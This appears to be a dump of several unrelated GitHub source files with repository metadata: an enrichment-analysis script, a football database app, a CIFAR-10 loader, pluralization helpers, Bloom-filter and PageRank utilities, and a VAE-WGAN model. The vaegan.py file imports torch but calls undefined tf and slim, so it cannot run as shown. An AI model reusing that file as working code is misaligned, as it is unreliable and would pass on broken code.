global _partition_entries
global _term_database
global _map_term_database
global _number_of_all_annotated
_number_of_all_annotated = all_counts
_term_database = {en : x for en, x in enumerate(term_database.items())} ## database of all annotations
_map_term_database = term_dataset ## entry to acc mappings
finalFrame = pd.DataFrame()
for k, v in topology_map.items():
print("Computing enrichment for partition {}".format(k))
## reassign for parallel usage
_partition_name = k
_partition_entries = v
## computational pool instantiation
ncpu = 2 #mp.cpu_count()
pool = mp.Pool(ncpu)
## compute the results
n = len(term_database)
step = ncpu ## number of parallel processes
jobs = [range(n)[i:i + step] for i in range(0, n, step)] ## generate jobs
## result container
tmpframe = pd.DataFrame(columns=['observation','term','pval'])
results = [parallel_enrichment(x) for x in range(n)]
# for batch in jobs:
# results = pool.map(parallel_enrichment,batch)
tmpframe = tmpframe.append(results,ignore_index=True)
## multitest corrections on partition level
significant, p_adjusted, sidak, bonf = multipletests(tmpframe['pval'],method="fdr_bh",is_sorted=False, returnsorted=False, alpha=0.05)
tmpframe['corrected_pval_fdr_bh'] = pd.Series(p_adjusted)
tmpframe['significant'] = pd.Series(significant)
tmpframe = tmpframe[tmpframe['significant'] == True]
finalFrame = finalFrame.append(tmpframe,ignore_index=True)
return finalFrame
if __name__ == "__main__":
print("Starting enrichment analysis..")
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--filename",default="./test.txt")
parser.add_argument("--filename_mappings",default="./test.txt")
args = parser.parse_args()
## 1.) read the database.
term_dataset, term_database, all_counts = read_uniprot_GO(args.filename)
## 2.) partition function dict.
topology_map = read_topology_mappings(args.filename_mappings)
## 3.) calculate p-vals.
significant_results = compute_enrichment(term_dataset, term_database, topology_map, all_counts,whole_term_list=False)
significant_results.to_csv("../example_outputs/term_examples.txt",sep=" ",header=False)
| [
"skrljblaz@gmail.com"
] | skrljblaz@gmail.com |
704c901c0beb1e642138f31847e55b736bb16ce0 | 6925af8f5c640faf84189953f263ab60b713919e | /Lab2/main.py | 16467a46a6bb1a4bc4fae87eda0783082508a962 | [] | no_license | vvvmvvv/DATABASE_KPI | 0e334df6068dc6dbdbecd58d6b39e0b5046246e3 | ee12346616b45f2cb3c629553bc316275a87c290 | refs/heads/master | 2020-09-29T18:21:24.884257 | 2019-12-11T01:35:01 | 2019-12-11T01:35:01 | 227,092,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,641 | py | import npyscreen
from dbManager import FootballDatabase
from forms.FindPlayer import FindPlayer
from forms.EditTournament import EditTournament
from forms.EditClub import EditClub
from forms.ClubsList import ClubsListDisplay
from forms.EditPlayer import EditPlayer
from forms.EntityList import EntityListDisplay
from forms.FullTextSearch import FullTextSearch
from forms.PlayersList import PlayersListDisplay
from forms.TournamentsList import TournamentsListDisplay
class FootballDBApplication(npyscreen.NPSAppManaged):
def onStart(self):
self.database = FootballDatabase()
self.database.connect()
self.database.exec_script_file('dropTables.sql')
self.database.exec_script_file('createTables.sql')
self.database.generate_random_clubs()
self.database.generate_random_players()
self.database.generate_random_tournaments()
self.addForm("MAIN", EntityListDisplay)
self.addForm("PLAYERSLIST", PlayersListDisplay)
self.addForm("EDITPLAYER", EditPlayer)
self.addForm("CLUBSLIST", ClubsListDisplay)
self.addForm("EDITCLUB", EditClub)
self.addForm("TOURNAMENTSLIST", TournamentsListDisplay)
self.addForm("EDITTOURNAMENT", EditTournament)
self.addForm("ADVANCEDSEARCH", FindPlayer)
self.addForm("TEXTSEARCH", FullTextSearch)
def onCleanExit(self):
self.database.close_connection()
if __name__ == '__main__':
myApp = FootballDBApplication()
print("Lab 2 by Vladimir Mikulin KP-71")
print('----------------------------------------')
print('Thank you for watching!!!!')
myApp.run()
| [
"boxingvm16@gmail.com"
] | boxingvm16@gmail.com |
fecf3c9497776515f270c2dd69738bea837cb34a | d466c19878c629d46c535f6613e0a051430aa8bd | /datasets.py | dffa9c9c35a6efc46b06adf372bd3c2122fbcde8 | [
"MIT"
] | permissive | nnuq/tpu | 3949929ad2e3eebd6ab703b3181c1dba1661f93d | cec2f34c07333dd43adf69a168ae82f5296a260b | refs/heads/master | 2023-07-20T04:28:48.753543 | 2020-05-26T13:49:29 | 2020-05-26T13:49:29 | 267,009,922 | 0 | 0 | MIT | 2023-07-06T21:27:44 | 2020-05-26T10:12:49 | Python | UTF-8 | Python | false | false | 1,221 | py | # -*- coding: utf-8 -*-
# @Date : 2019-07-25
# @Author : Xinyu Gong (xy_gong@tamu.edu)
# @Link : None
# @Version : 0.0
import torch
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from torch.utils.data import Dataset
class ImageDataset(object):
def __init__(self, args, cur_img_size=None):
img_size = cur_img_size if cur_img_size else args.img_size
if args.dataset.lower() == 'cifar10':
Dt = datasets.CIFAR10
transform = transforms.Compose([
transforms.Resize(img_size),
transforms.ToTensor()
])
else:
raise NotImplementedError('Unknown dataset: {}'.format(args.dataset))
self.train = torch.utils.data.DataLoader(
Dt(root=args.data_path, train=True, transform=transform, download=True),
batch_size=args.train_batch_size, shuffle=True,
num_workers=args.num_workers, pin_memory=True)
self.valid = torch.utils.data.DataLoader(
Dt(root=args.data_path, train=False, transform=transform),
batch_size=args.eval_batch_size, shuffle=False,
num_workers=args.num_workers, pin_memory=True) | [
"rmermin@yahoo.com"
] | rmermin@yahoo.com |
ad2593ec004110646224f27a2a526b0362b394d7 | 93823cd2d697be367c08d0d8ec7644c2f4a6ab0d | /cuticulus/__init__.py | ce2e9369433af0ab344983d877a3cdb5fd14edf1 | [
"MIT"
] | permissive | CMVSR/cuticulus | d15f5ae6c74ad6f4939ea72b066b37c03db4a6e7 | fd8f3108f5c5547ed56a902cc8d058eedd216908 | refs/heads/main | 2023-05-28T01:54:24.159823 | 2022-10-13T22:53:19 | 2022-10-13T22:53:19 | 376,367,066 | 0 | 0 | MIT | 2022-09-23T15:24:32 | 2021-06-12T19:14:28 | Jupyter Notebook | UTF-8 | Python | false | false | 42 | py | """Main module and exported functions."""
| [
"ngngardner@gmail.com"
] | ngngardner@gmail.com |
83dc48d096fb5a7bbac051cd9371739900fe57a9 | 72efaf7ee46ae000773a7c09437b9be3ca223552 | /pluralization.py | 2baeedc39d505e1760947971608b189d703e78c0 | [] | no_license | Frifon/CS_MSU_203_bot | 962bb8ac6be0d530f2cf0cf670daf9a258828910 | 76ed63e0baf334ab349985a4ed5864bac7b573bc | refs/heads/master | 2021-01-16T19:40:17.179924 | 2015-09-09T08:39:29 | 2015-09-09T08:39:29 | 42,131,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py | def s1(x):
if 11 <= x % 100 <= 19 or 5 <= x % 10 <= 9 or x % 10 == 0:
return "ов"
elif 2 <= x % 10 <= 4:
return "а"
else:
return ""
def s2(x):
if 11 <= x % 100 <= 19 or 5 <= x % 10 <= 9 or x % 10 == 0:
return ""
elif 2 <= x % 10 <= 4:
return "ы"
else:
return "а"
| [
"kkrugl@yandex.ru"
] | kkrugl@yandex.ru |
e00ae3abefa88548226195bed1c30c7e690537d8 | 5fa5c07da210b72891b733359b37630bada126a0 | /GA_ProjectUtils.py | 056b77f4bfee30e7b3cb0914a7fc6fdb028b1f53 | [] | no_license | max-kazak/PageRank | 6f82b532a07c4955248e19e3537109987e6d4265 | 190b017b286a63abf4006a7a78342acfab3d62a4 | refs/heads/master | 2020-09-09T02:44:33.148309 | 2019-11-12T22:09:19 | 2019-11-12T22:09:19 | 221,321,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,146 | py | # -*- coding: utf-8 -*-
"""
Utility functions - do not modify these functions! Some of these functions may not be applicable to your project. Ignore them
If you find errors post to class piazza page.
"""
#import time
#import os
#useful structure to build dictionaries of lists
#from collections import defaultdict
########################################
#IO and Util functions
#returns sorted version of l, and idx order of sort
def getSortResIDXs(l, rev=True):
from operator import itemgetter
return zip(*sorted([(i,e) for i,e in enumerate(l)],
key=itemgetter(1),reverse=rev))
#read srcFile into list of ints
def readIntFileDat(srcFile):
strs = readFileDat(srcFile)
res = [int(s.strip()) for s in strs]
return res
#read srcFile into list of floats
def readFloatFileDat(srcFile):
strs = readFileDat(srcFile)
res = [float(s.strip()) for s in strs]
return res
#read srcFile into list of strings
def readFileDat(srcFile):
import os
try:
f = open(srcFile, 'r')
except IOError:
#file doesn't exist, return empty list
print('Note : {} does not exist in current dir : {}'.format(srcFile, os.getcwd()))
return []
src_lines = f.readlines()
f.close()
return src_lines
#write datList into fName file
def writeFileDat(fName, datList):
f = open(fName, 'w')
for item in datList:
print>>f, item
f.close()
#append record to existing file
def appendFileDat(fName, dat):
f = open(fName, 'a+')
print>>f, dat
f.close()
########################################
#Bloom Filter Project functions
#this will compare the contents of the resList with the data in baseFile
#and display performance
def compareResults(resList, configData):
baseFileName = configData['valFileName']
baseRes = readFileDat(baseFileName)
if(len(baseRes) != len(resList) ):
print('compareFiles : Failure : Attempting to compare different size lists')
return None
numFail = 0
numFTrueRes = 0
numFFalseRes = 0
for i in range(len(resList)):
if (resList[i].strip().lower() != baseRes[i].strip().lower()):
resVal = resList[i].strip().lower()
baseResVal = baseRes[i].strip().lower()
#uncomment this to see inconsistencies
#print('i : ' + str(i) + ': reslist : ' + resVal + ' | baseres : ' + baseResVal)
numFail += 1
if resVal == 'true' :
numFTrueRes += 1
else :
numFFalseRes += 1
if(numFail == 0):
print('compareResults : Your bloom filter performs as expected')
else:
print('compareResults : Number of mismatches in bloomfilter compared to validation file : ' + str(numFail) + '| # of incorrect true results : ' + str(numFTrueRes) + '| # of incorrect False results : ' + str(numFFalseRes))
if((configData['studentName'] != '') and (configData['autograde'] == 2)):
gradeRes = configData['studentName'] + ', ' + str(numFail) + ', ' + str(numFTrueRes) + ', ' + str(numFFalseRes)
print('saving results for ' + gradeRes + ' to autogradeResult.txt')
appendFileDat('autogradeResult.txt', gradeRes)
#this will process input configuration and return a dictionary holding the relevant info
def buildBFConfigStruct(args):
import time
bfConfigData = readFileDat(args.configFileName)
configData = dict()
for line in bfConfigData:
#build dictionary on non-list elements
if (line[0]=='#') or ('_' in line):
continue
elems = line.split('=')
if('name' in elems[0]):
configData[elems[0]]=elems[1].strip()
else :
configData[elems[0]]=int(elems[1])
if ('Type 1' in configData['name']):
configData['type'] = 1
configData['seeds'] = buildSeedList(bfConfigData, int(configData['k']))
elif ('Type 2' in configData['name']):
configData['type'] = 2
aListData = []
bListData = []
listToAppend = aListData
for line in bfConfigData:
if (line[0]=='#'):
if ('b() seeds' in line):
listToAppend = bListData
continue
listToAppend.append(line)
configData['a']= buildSeedList(aListData, int(configData['k']))
configData['b']= buildSeedList(bListData, int(configData['k']))
else :
configData['type'] = -1
print('unknown hash function specified in config file')
configData['task'] = int(args.taskToDo)
if configData['task'] != 2 :
configData['genSeed'] = int(time.time()*1000.0) & 0x7FFFFFFF #(int)(tOffLong & 0x7FFFFFFF);
print('Random Time Seed is : ' + str(configData['genSeed']))
configData['inFileName'] = args.inFileName
configData['outFileName'] = args.outFileName
configData['configFileName'] = args.configFileName
configData['valFileName'] = args.valFileName
configData['studentName'] = args.studentName
configData['autograde'] = int(args.autograde)
for k,v in configData.iteritems():
print('Key = ' + k + ': Val = '),
print(v)
return configData
def buildSeedList(stringList, k):
res = [0 for x in range(k)]
for line in stringList:
if ('_' not in line) or (line[0]=='#'):
continue
elems = line.split('=')
araElems = elems[0].split('_')
res[int(araElems[1])]=int(elems[1])
return res
"""
Function provided for convenience, to find next prime value from passed value
Use this to find an appropriate prime size for type 2 hashes.
Finds next prime value larger than n via brute force. Checks subsequent numbers
until prime is found - should be much less than 160 checks for any values
seen in this project since largest gap g between two primes for any 32 bit
signed int is going to be g < 336, and only have to check at most every
other value in gap. For more, see this article :
https://en.wikipedia.org/wiki/Prime_gap
n : some value
return next largest prime
"""
def findNextPrime(n):
if (n==2) :
return 2
if (n%2==0):
n+=1
#n is odd here; 336 is larger than largest gap between 2 consequtive 32 bit primes
for i in range (n,(n + 336), 2):
if checkIfPrime(i):
return i
#error no prime found returns -1
return -1
"""
check if value is prime, return true/false
n value to check
"""
def checkIfPrime(n):
if (n < 2) : return False
if (n < 4) : return True
if ((n % 2 == 0) or (n % 3 == 0)): return False
sqrtN = n**(.5)
i = 5
w = 2
while (i <= sqrtN):
if (n % i == 0): return False
i += w
#addresses mod2 and mod3 above, flip flops between looking ahead 2 and 4 (every other odd is divisible by 3)
w = 6-w
return True
## end bloom filter functions
######################################
########################################
#Page Rank Functions
#get file values for particular object and alpha value
#results are list of nodes, list of rank values and dictionary matching node to rank value
#list of nodes and list of rank values are sorted
def getResForPlots(prObj, alpha):
outFileName = makeResOutFileName(prObj.inFileName, alpha, prObj.sinkHandling)
vNodeIDs_unsr, vRankVec_unsr = loadRankVectorData(outFileName, isTest=False)
#build dictionary that links node id to rank value
vNodeDict = buildValidationDict(vNodeIDs_unsr,vRankVec_unsr)
#build sorted list
vNodeIDs, vRankVec = getSortResIDXs(vRankVec_unsr)
return vNodeIDs, vRankVec, vNodeDict
#build appropriate results file name based on passed input name, alpha and sink handling flag
def makeResOutFileName(inFileName,alpha,sinkHandling):
nameList = inFileName.strip().split('.')
namePrefix = '.'.join(nameList[:-1])
#build base output file name based on input file name and whether or not using selfloops to handle sinks
outFileName = "{}_{}_{}.{}".format(namePrefix,("SL" if sinkHandling==0 else "T3"), alpha,nameList[-1])
return outFileName
#builds output file names given passed file name
def buildPROutFNames(fName, getVerifyNames=False):
#construct ouput file names based on fName (which is input file name : i.e. 'inputstuff.txt')
nameList = fName.strip().split('.')
#name without extension
namePrefix = '.'.join(nameList[:-1])
if getVerifyNames :
#get names for verification files
#file holding rank vector values
voutFName = '{}-{}.{}'.format(namePrefix, 'verifyRVec',nameList[-1])
return voutFName
else :
#names for saving results or accessing saved results
#file holding rank vector values
outFName = '{}-{}.{}'.format(namePrefix, 'outputPR',nameList[-1])
return outFName
#this will build a dictionary with :
# keys == graph nodes and
# values == list of pages accessible from key
# and will also return a list of all node ids
# using terminology from lecture, this builds the "out list" for each node in
# file, and a list of all node ids
def loadGraphADJList(fName):
from collections import defaultdict
#defaultDict has 0/empty list entry for non-present keys,
#does not return invalid key error
resDict = defaultdict(list)
filedat = readFileDat(fName)
allNodesSet = set()
#each line has a single number, followed by a colon, followed by a list of
#1 or more numbers spearated by commas
#these represent node x : reachable nodes from node x
for line in filedat:
vals = line.strip().split(':')
adjValStrs = vals[1].strip().split(',')
#convert list of strings to list of ints
adjVals = [int(s.strip()) for s in adjValStrs]
key = int(vals[0].strip())
allNodesSet.add(key)
allNodesSet.update(adjVals)
resDict[key] = adjVals
return resDict, list(allNodesSet)
#given the base input file name
#this will return a list of nodes in order of rank (if rankName file exists)
#and a vector of rank values as floats (if outputName file exists)
#using either base file extensions or the verification file names
def loadRankVectorData(fName, isTest=False):
outFName = buildPROutFNames(fName, isTest)
#read rank vector as list of floats, expected to be in order of node ids
rankVec = readFloatFileDat(outFName)
rankedIDS = list(xrange(len(rankVec)))
#either output, or both, might be empty list(s) if files don't exist
return rankedIDS, rankVec
#will save a list of nodes in order of rank, and rank values (the rank vector) for those nodes in same order
#in two separate files
def saveRankData(fName, rankVec=None):
outFName = buildPROutFNames(fName)
if(rankVec != None):
writeFileDat(outFName, rankVec)
print('Rank vector saved to file {}'.format(outFName))
#build a dictionary that will have node id as key and rank vector value as value - used for verification since equal rank vector values might be in different order
def buildValidationDict(nodeIDs, rankVec):
vDict = {}
for x in xrange(len(nodeIDs)):
vDict[nodeIDs[x]] = rankVec[x]
return vDict
"""
using provided output file, verify calculated page rank is the same as expected results
args used for autograder version
"""
def verifyResults(prObj, args=None, eps=.00001):
print('\nVerifying results for input file "{}" using alpha={} and {} sink handling :\n'.format(prObj.inFileName, prObj.alpha, ('self loop' if prObj.sinkHandling==0 else 'type 3')))
#load derived values from run of page rank
calcNodeIDs,calcRankVec = loadRankVectorData(prObj.outFileName, isTest=False)
#load verification data
vNodeIDs, vRankVec = loadRankVectorData(prObj.outFileName, isTest=True)
if (len(vNodeIDs) == 0) or (len(vRankVec)==0) :
print ('Validation data not found, cannot test results')
return False
#compare nodeID order
if(len(calcNodeIDs) != len(vNodeIDs)) :
print('!!!! Error : incorrect # of nodes in calculated page rank - yours has {}; validation has {}'.format(len(calcNodeIDs),len(vNodeIDs)))
return False
print('Calculated Rank vector is of appropriate length')
#need to verify that rank vector sums to 1
cRVecSum = sum(calcRankVec)
if abs(cRVecSum - 1) > eps :
print('!!!! Error : your calculated rank vector values do not sum to 1.0 : {} '.format(cRVecSum))
return False
print('Calculated Rank vector has appropriate magnitude of 1.0')
#build dictionary of validation data and test data - doing this because order might be different for nodes with same rank value
validDict = buildValidationDict(vNodeIDs,vRankVec)
calcDict = buildValidationDict(calcNodeIDs,calcRankVec)
#compare if matched - Note nodes with same rank value vector value might be out of order
for x in xrange(len(vNodeIDs)):
if abs(calcDict[vNodeIDs[x]] - validDict[vNodeIDs[x]]) > eps :
print('!!!! Error : rank vector values do not match, starting at idx {}, node {}, in validation node id list'.format(x,vNodeIDs[x]))
return False
print('Rank Vector values match verification vector values')
return True
#autograder code
def autogradePR(prObj, args, prMadeTime):
print('Running autograder on {} for prObj with input file {}'.format(args.studentName, prObj.inFileName))
#End Page Rank Functions
########################################
| [
"mk@Maxims-MacBook-Pro.local"
] | mk@Maxims-MacBook-Pro.local |
c26da058b911281e11464c3b69cd511474dda0e1 | eb1fcb86fe1f8e1738085a152407abb57280eaad | /hw2/hw2-3/model/vaegan.py | a01eafafeb77599780396c24bd2a5da64ceedfdb | [
"BSD-3-Clause"
] | permissive | getinglxf/DLHLP2020-SPRING | e813946f937863e693913ef3d664c45b23a1b17e | d336c8bfa2b28c6817f1899a89ab5c6b12fe059f | refs/heads/master | 2022-11-06T20:56:34.204010 | 2020-06-23T08:21:52 | 2020-06-23T08:21:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,869 | py | import pdb
##from tensorflow.contrib import slim
import torch
from util.layer import GaussianLogDensity, GaussianKLD, \
GaussianSampleLayer, lrelu
class VAWGAN(object):
'''
VC-GAN
= CVAE-CGAN
= Convolutional Variational Auto-encoder
with Conditional Generative Adversarial Net
'''
def __init__(self, arch, is_training=False):
self.arch = arch
self._sanity_check()
self.is_training = is_training
with tf.name_scope('SpeakerRepr'):
self.y_emb = self._unit_embedding(
self.arch['y_dim'],
self.arch['z_dim'],
'y_embedding')
self._generate = tf.make_template(
'Generator',
self._generator)
self._discriminate = tf.make_template(
'Discriminator',
self._discriminator)
self._encode = tf.make_template(
'Encoder',
self._encoder)
def _sanity_check(self):
for net in ['encoder', 'generator', 'discriminator']:
assert len(self.arch[net]['output']) > 2
assert len(self.arch[net]['output']) == len(self.arch[net]['kernel'])
assert len(self.arch[net]['output']) == len(self.arch[net]['stride'])
def _unit_embedding(self, n_class, h_dim, scope_name, var_name='y_emb'):
with tf.variable_scope(scope_name):
embeddings = tf.get_variable(
name=var_name,
shape=[n_class, h_dim])
embeddings = tf.nn.l2_normalize(embeddings, dim=-1, name=var_name+'normalized')
return embeddings
def _merge(self, var_list, fan_out, l2_reg=1e-6):
'''
Note: Don't apply BN on this because 'y'
tends to be the same inside a batch.
'''
x = 0.
with slim.arg_scope(
[slim.fully_connected],
num_outputs=fan_out,
weights_regularizer=slim.l2_regularizer(l2_reg),
normalizer_fn=None,
activation_fn=None):
for var in var_list:
x = x + slim.fully_connected(var)
x = slim.bias_add(x)
return x
def _l2_regularized_embedding(self, n_class, h_dim, scope_name, var_name='y_emb'):
with tf.variable_scope(scope_name):
embeddings = tf.get_variable(
name=var_name,
shape=[n_class, h_dim],
regularizer=slim.l2_regularizer(1e-6))
return embeddings
def _encoder(self, x, is_training):
n_layer = len(self.arch['encoder']['output'])
subnet = self.arch['encoder']
with slim.arg_scope(
[slim.batch_norm],
scale=True, scope='BN',
updates_collections=None,
decay=0.9, epsilon=1e-5, # [TODO] Test these hyper-parameters
is_training=is_training):
with slim.arg_scope(
[slim.conv2d],
weights_regularizer=slim.l2_regularizer(subnet['l2-reg']),
normalizer_fn=slim.batch_norm,
activation_fn=lrelu):
for i in range(n_layer):
x = slim.conv2d(
x,
subnet['output'][i],
subnet['kernel'][i],
subnet['stride'][i])
tf.summary.image(
'down-sample{:d}'.format(i),
tf.transpose(x[:, :, :, 0:3], [2, 1, 0, 3]))
x = slim.flatten(x)
with slim.arg_scope(
[slim.fully_connected],
num_outputs=self.arch['z_dim'],
weights_regularizer=slim.l2_regularizer(subnet['l2-reg']),
normalizer_fn=None,
activation_fn=None):
z_mu = slim.fully_connected(x)
z_lv = slim.fully_connected(x)
return z_mu, z_lv
def _generator(self, z, y, is_training):
''' In this version, we only generate the target, so `y` is useless '''
subnet = self.arch['generator']
n_layer = len(subnet['output'])
h, w, c = subnet['hwc']
y = tf.nn.embedding_lookup(self.y_emb, y)
x = self._merge([z, y], subnet['merge_dim'])
x = lrelu(x)
with slim.arg_scope(
[slim.batch_norm],
scale=True, scope='BN',
updates_collections=None,
decay=0.9, epsilon=1e-5,
is_training=is_training):
x = slim.fully_connected(
x,
h * w * c,
normalizer_fn=slim.batch_norm,
activation_fn=lrelu)
x = tf.reshape(x, [-1, h, w, c])
with slim.arg_scope(
[slim.conv2d_transpose],
weights_regularizer=slim.l2_regularizer(subnet['l2-reg']),
normalizer_fn=slim.batch_norm,
activation_fn=lrelu):
for i in range(n_layer -1):
x = slim.conv2d_transpose(
x,
subnet['output'][i],
subnet['kernel'][i],
subnet['stride'][i]
# normalizer_fn=None
)
# Don't apply BN for the last layer of G
x = slim.conv2d_transpose(
x,
subnet['output'][-1],
subnet['kernel'][-1],
subnet['stride'][-1],
normalizer_fn=None,
activation_fn=None)
# pdb.set_trace()
logit = x
x = tf.nn.tanh(logit)
return x, logit
def _discriminator(self, x, is_training):
# def _discriminator(self, x, is_training):
''' Note: In this version, `y` is useless '''
subnet = self.arch['discriminator']
n_layer = len(subnet['output'])
# y_dim = self.arch['y_dim']
# h, w, _ = self.arch['hwc']
# y_emb = self._l2_regularized_embedding(y_dim, h * w, 'y_embedding_disc_in')
# y_vec = tf.nn.embedding_lookup(y_emb, y)
# y_vec = tf.reshape(y_vec, [-1, h, w, 1])
intermediate = list()
intermediate.append(x)
# x = tf.concat(3, [x, y_vec]) # inject y into x
with slim.arg_scope(
[slim.batch_norm],
scale=True, scope='BN',
updates_collections=None,
decay=0.9, epsilon=1e-5,
is_training=is_training):
with slim.arg_scope(
[slim.conv2d],
weights_regularizer=slim.l2_regularizer(subnet['l2-reg']),
normalizer_fn=slim.batch_norm,
activation_fn=lrelu):
# Radford: [do] not applying batchnorm to the discriminator input layer
x = slim.conv2d(
x,
subnet['output'][0],
subnet['kernel'][0],
subnet['stride'][0],
normalizer_fn=None)
intermediate.append(x)
for i in range(1, n_layer):
x = slim.conv2d(
x,
subnet['output'][i],
subnet['kernel'][i],
subnet['stride'][i])
intermediate.append(x)
tf.summary.image(
'upsampling{:d}'.format(i),
tf.transpose(x[:, :, :, 0:3], [2, 1, 0, 3]))
# Don't apply BN for the last layer
x = slim.flatten(x)
h = slim.flatten(intermediate[subnet['feature_layer'] - 1])
# y_vec = tf.nn.embedding_lookup(self.y_emb, y)
# x = self._merge([x], subnet['merge_dim'])
# x = lrelu(x)
# x = slim.fully_connected(
# x,
# subnet['merge_dim'],
# weights_regularizer=slim.l2_regularizer(subnet['l2-reg']),
# activation_fn=lrelu)
x = slim.fully_connected(
x,
1,
weights_regularizer=slim.l2_regularizer(subnet['l2-reg']),
activation_fn=None)
return x, h # no explicit `sigmoid`
def loss(self, x_s, y_s, x_t, y_t):
''' '''
# def thresholding_add(x, v, minval=-1., maxval=1.):
# x_v = x + v
# x_v = tf.maximum(x_v, minval)
# x_v = tf.minimum(x_v, maxval)
# return x_v
def circuit_loop(x, y):
# v = decay * tf.random_normal(shape=tf.shape(x))
z_mu, z_lv = self._encode(x, is_training=self.is_training)
z = GaussianSampleLayer(z_mu, z_lv)
x_logit, x_feature = self._discriminate(
x, is_training=self.is_training)
xh, xh_sig_logit = self._generate(z, y, is_training=self.is_training)
zh_mu, zh_lv = self._encode(xh, is_training=self.is_training)
xh_logit, xh_feature = self._discriminate(
xh, is_training=self.is_training)
return dict(
z=z,
z_mu=z_mu,
z_lv=z_lv,
# y_logit=y_logit,
xh=xh,
xh_sig_logit=xh_sig_logit,
# xo=xo,
x_logit=x_logit,
x_feature=x_feature,
zh_mu=zh_mu,
zh_lv=zh_lv,
# yh_logit=yh_logit,
xh_logit=xh_logit,
xh_feature=xh_feature,
# xr=xr
)
s = circuit_loop(x_s, y_s)
t = circuit_loop(x_t, y_t)
s2t = circuit_loop(x_s, y_t)
with tf.name_scope('loss'):
def mean_sigmoid_cross_entropy_with_logits(logit, truth):
'''
truth: 0. or 1.
'''
return tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logit,
truth * tf.ones_like(logit)))
loss = dict()
# Parallel
loss['reconst_t'] = \
tf.reduce_mean(t['x_logit']) \
- tf.reduce_mean(t['xh_logit'])
# Parallel
loss['reconst_s'] = \
tf.reduce_mean(s['x_logit']) \
- tf.reduce_mean(s['xh_logit'])
# Non-parallel
loss['conv_s2t'] = \
tf.reduce_mean(t['x_logit']) \
- tf.reduce_mean(s2t['xh_logit'])
# Non-parallel: s v. t
loss['real_s_t'] = \
tf.reduce_mean(t['x_logit']) \
- tf.reduce_mean(s['x_logit'])
# That's why I only take the last term into consideration
loss['WGAN'] = loss['conv_s2t']
# VAE's Kullback-Leibler Divergence
loss['KL(z)'] = \
tf.reduce_mean(
GaussianKLD(
s['z_mu'], s['z_lv'],
tf.zeros_like(s['z_mu']), tf.zeros_like(s['z_lv']))) +\
tf.reduce_mean(
GaussianKLD(
t['z_mu'], t['z_lv'],
tf.zeros_like(t['z_mu']), tf.zeros_like(t['z_lv'])))
loss['KL(z)'] /= 2.0
# VAE's Reconstruction Neg. Log-Likelihood (on the 'feature' space of Dx)
loss['Dis'] = \
tf.reduce_mean(
GaussianLogDensity(
slim.flatten(x_t),
slim.flatten(t['xh']),
tf.zeros_like(slim.flatten(x_t)))) +\
tf.reduce_mean(
GaussianLogDensity(
slim.flatten(x_s),
slim.flatten(s['xh']),
tf.zeros_like(slim.flatten(x_s))))
loss['Dis'] /= - 2.0
# loss['Dis'] = tf.reduce_mean(
# tf.reduce_sum(
# tf.nn.sigmoid_cross_entropy_with_logits(
# slim.flatten(t['xh_sig_logit']),
# slim.flatten(x_t * .5 + .5)) +\
# tf.nn.sigmoid_cross_entropy_with_logits(
# slim.flatten(s['xh_sig_logit']),
# slim.flatten(x_s * .5 + .5)),
# -1))
# # Note: Please remember to apply reduce_sum along the last dim
# # (here, it's not 1 as is in D/G loss.)
# loss['Dis'] = tf.reduce_mean(
# (s2t['xh_logit'] + s['xh_logit'] + t['xh_logit']) / 3.)
# # Use 'feature' item instead of raw input because the former is 'flattened'
# loss['Dis'] = tf.reduce_mean(
# tf.reduce_sum(tf.square(s['x_feature'] - s['xh_feature']), -1) +\
# tf.reduce_sum(tf.square(t['x_feature'] - t['xh_feature']), -1))
# [TODO] Maybe I should normalize (divide by 2 or 3) the above costs.
# For summaries
with tf.name_scope('Summary'):
# tf.summary.scalar('DKL_x', loss['KL(x)'])
tf.summary.scalar('DKL_z', loss['KL(z)'])
tf.summary.scalar('MMSE', loss['Dis'])
# tf.summary.scalar('D_real', loss['D_real'])
# tf.summary.scalar('G_fake', loss['G_fake'])
tf.summary.scalar('WGAN', loss['WGAN'])
tf.summary.scalar('WGAN-s', loss['reconst_s'])
tf.summary.scalar('WGAN-t', loss['reconst_t'])
tf.summary.scalar('WGAN-s2t', loss['conv_s2t'])
tf.summary.scalar('WGAN-t-s', loss['real_s_t'])
tf.summary.histogram('y', tf.concat(0, [y_t, y_s]))
# tf.summary.histogram('yh_s', tf.argmax(s['yh_logit'], 1))
# tf.summary.histogram('yh_t', tf.argmax(t['yh_logit'], 1))
tf.summary.histogram('z', tf.concat(0, [s['z'], t['z']]))
tf.summary.histogram('z_s', s['z'])
tf.summary.histogram('z_t', t['z'])
tf.summary.histogram('z_mu', tf.concat(0, [s['z_mu'], t['z_mu']]))
tf.summary.histogram('z_mu_s', s['z_mu'])
tf.summary.histogram('z_mu_t', t['z_mu'])
tf.summary.histogram('z_lv', tf.concat(0, [s['z_lv'], t['z_lv']]))
tf.summary.histogram('z_lv_s', s['z_lv'])
tf.summary.histogram('z_lv_t', t['z_lv'])
# tf.summary.histogram('D_t_t', tf.nn.sigmoid(x_t_from_t_logit))
# tf.summary.histogram('D_t_s', tf.nn.sigmoid(x_t_from_s_logit))
# tf.summary.histogram('D_t', tf.nn.sigmoid(x_t_logit))
# tf.summary.histogram('D_s', tf.nn.sigmoid(x_s_logit))
tf.summary.histogram('logit_t_from_t', t['xh_logit'])
tf.summary.histogram('logit_t_from_s', s2t['xh_logit'])
tf.summary.histogram('logit_t', t['x_logit'])
# tf.summary.histogram('logit_s', s['x_logit'])
# tf.summary.histogram(
# 'logit_s_True_and_Fake)',
# tf.concat(0, [x_s_from_s_logit, x_s_logit]))
tf.summary.histogram(
'logit_t_True_FromT_FromS',
tf.concat(0, [t['x_logit'], t['xh_logit'], s2t['xh_logit']]))
tf.summary.histogram(
'logit_s_v_sh',
tf.concat(0, [s['x_logit'], s['xh_logit']]))
tf.summary.histogram(
'logit_t_v_th',
tf.concat(0, [t['x_logit'], t['xh_logit']]))
# # tf.image_summary("G", xh)
# tf.summary.scalar('Ent_on_y', loss['y'])
# tf.summary.scalar('Diff_zs_zt', loss['z'])
return loss
# def sample(self, z=128):
# ''' Generate fake samples given `z`
# if z is not given or is an `int`,
# this fcn generates (z=128) samples
# '''
# z = tf.random_uniform(
# shape=[z, self.arch['z_dim']],
